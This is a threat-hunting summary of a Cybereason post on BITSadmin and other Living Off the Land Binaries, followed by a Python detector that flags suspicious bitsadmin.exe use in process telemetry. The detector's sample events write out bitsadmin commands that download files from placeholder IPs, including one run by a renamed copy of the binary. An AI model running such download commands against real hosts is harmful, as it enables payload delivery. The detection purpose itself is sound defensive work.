2022-03-15

Cybereason LOLBins & BITSadmin

Level: Tactical | Source: Cybereason | Technology

Cybereason's threat hunting post examines the use of Living Off the Land Binaries (LOLBins) and takes a deep dive into the tool BITSadmin. Many malware and ransomware variants abuse trusted binaries for threat activity. Notable LOLBins utilized include msiexec, wscript, installutil, rundll32, regsvr32, wmic, certutil and bitsadmin. A variety of other applicable LOLBins can be reviewed in the LOLBAS project on GitHub, with many detections also available in the Anvilogic Armory. Analysis of BITSAdmin identified that the tool has many applicable uses to "create, download, or upload jobs and monitor their progress", as detailed in Microsoft's documentation. Attackers have leveraged BITSadmin's capabilities to download malicious payloads and/or to copy and move files. Various malware families, such as Astaroth, Egregor ransomware and the Ramnit trojan, have utilized BITSadmin.
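A detection-side worked example, added here and not taken from the Cybereason post or from Anvilogic's Armory: it scans constructed Sysmon-style process-creation events for bitsadmin.exe invocations that download remote content or stage files, the two abuse patterns the summary describes. The field names, the hypothetical allowlisted parent process `agent.exe` and every sample event are assumptions made for the demonstration.

```python
"""Hunt for suspicious BITSadmin use in process-creation telemetry.

Added example, not code from the Cybereason post or from Anvilogic. Field
names, the allowlisted parent process and the sample events below are all
assumptions constructed for the demonstration.
"""
import json
import re
from dataclasses import dataclass, field

# Constructed JSON-lines telemetry with Sysmon-style process-creation fields.
SAMPLE_EVENTS = r"""
{"ts":"2022-03-15T10:01:02Z","host":"WS01","user":"CORP\\alice","image":"C:\\Windows\\System32\\bitsadmin.exe","original_file_name":"bitsadmin.exe","parent_image":"C:\\Windows\\System32\\cmd.exe","command_line":"bitsadmin /transfer upd /download /priority high http://203.0.113.10/a.dat C:\\Users\\Public\\a.dat"}
{"ts":"2022-03-15T10:01:09Z","host":"WS01","user":"CORP\\alice","image":"C:\\Windows\\System32\\bitsadmin.exe","original_file_name":"bitsadmin.exe","parent_image":"C:\\Windows\\System32\\cmd.exe","command_line":"bitsadmin /create stage"}
{"ts":"2022-03-15T10:01:10Z","host":"WS01","user":"CORP\\alice","image":"C:\\Windows\\System32\\bitsadmin.exe","original_file_name":"bitsadmin.exe","parent_image":"C:\\Windows\\System32\\cmd.exe","command_line":"bitsadmin /addfile stage \\\\fs01\\share\\tool.exe C:\\ProgramData\\tool.exe"}
{"ts":"2022-03-15T10:02:00Z","host":"WS02","user":"NT AUTHORITY\\SYSTEM","image":"C:\\Windows\\System32\\bitsadmin.exe","original_file_name":"bitsadmin.exe","parent_image":"C:\\Program Files\\MgmtAgent\\agent.exe","command_line":"bitsadmin /transfer swupdate http://updates.example.internal/pkg.cab C:\\ProgramData\\pkg.cab"}
{"ts":"2022-03-15T10:03:00Z","host":"WS03","user":"CORP\\bob","image":"C:\\Users\\bob\\AppData\\Local\\Temp\\svchost.exe","original_file_name":"bitsadmin.exe","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"svchost.exe /transfer j /download https://198.51.100.7/p.bin C:\\Users\\bob\\p.bin"}
{"ts":"2022-03-15T10:04:00Z","host":"WS04","user":"CORP\\carol","image":"C:\\Windows\\System32\\notepad.exe","original_file_name":"notepad.exe","parent_image":"C:\\Windows\\explorer.exe","command_line":"notepad.exe notes.txt"}
"""

# BITSadmin verbs that create, populate or run a transfer job (from the
# bitsadmin command reference). Monitoring-only verbs such as /list are ignored.
TRANSFER_VERBS = {"/create", "/addfile", "/transfer", "/download", "/upload",
                  "/resume", "/complete"}

# Sources outside the local filesystem: HTTP(S) URLs and UNC paths.
REMOTE_SOURCE = re.compile(r"https?://\S+|\\\\[^\\\s]+\\\S+", re.IGNORECASE)

# Hypothetical parent process that legitimately drives BITS on managed hosts.
EXPECTED_PARENTS = {"agent.exe"}


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    severity: str
    command_line: str
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: dict):
    """Return a Finding when the event looks like BITSadmin abuse, else None."""
    image = _basename(ev.get("image", ""))
    original = ev.get("original_file_name", "").lower()
    # Match on the PE's OriginalFileName too, so a renamed copy is still caught.
    if image != "bitsadmin.exe" and original != "bitsadmin.exe":
        return None
    cmd = ev.get("command_line", "")
    tokens = [t.lower() for t in cmd.split()]
    verbs = sorted({t for t in tokens if t in TRANSFER_VERBS})
    remote = REMOTE_SOURCE.findall(cmd)
    if not verbs and not remote:
        return None  # /list, /info, /getstate ...: monitoring only
    reasons = []
    if image != "bitsadmin.exe":
        reasons.append(f"bitsadmin.exe running under the name {image}")
    if verbs:
        reasons.append("transfer verbs: " + " ".join(verbs))
    if remote:
        reasons.append("remote source: " + " ".join(remote))
    parent = _basename(ev.get("parent_image", ""))
    if parent in EXPECTED_PARENTS:
        severity = "low"
        reasons.append(f"parent {parent} is an expected BITS driver")
    elif remote or image != "bitsadmin.exe":
        severity = "high"
        reasons.append(f"unexpected parent {parent}")
    else:
        severity = "medium"  # job staged locally, no remote source seen yet
        reasons.append(f"unexpected parent {parent}")
    return Finding(ev["ts"], ev["host"], ev["user"], severity, cmd, reasons)


def hunt(jsonl: str) -> list:
    """Parse JSON-lines telemetry and return findings in event order."""
    events = [json.loads(line) for line in jsonl.splitlines() if line.strip()]
    return [f for f in map(analyze_event, events) if f is not None]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.ts} {f.host} {f.user}: {f.command_line}")
        for r in f.reasons:
            print("          -", r)
```

Two design points carry over to a real environment: matching on the PE's OriginalFileName rather than only the image path is what surfaces a renamed copy of bitsadmin.exe, and ignoring monitoring-only verbs keeps routine BITS administration from drowning the alerts. The parent-process allowlist and the remote-source pattern are the knobs to tune against the baseline of legitimate BITS jobs on the estate.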
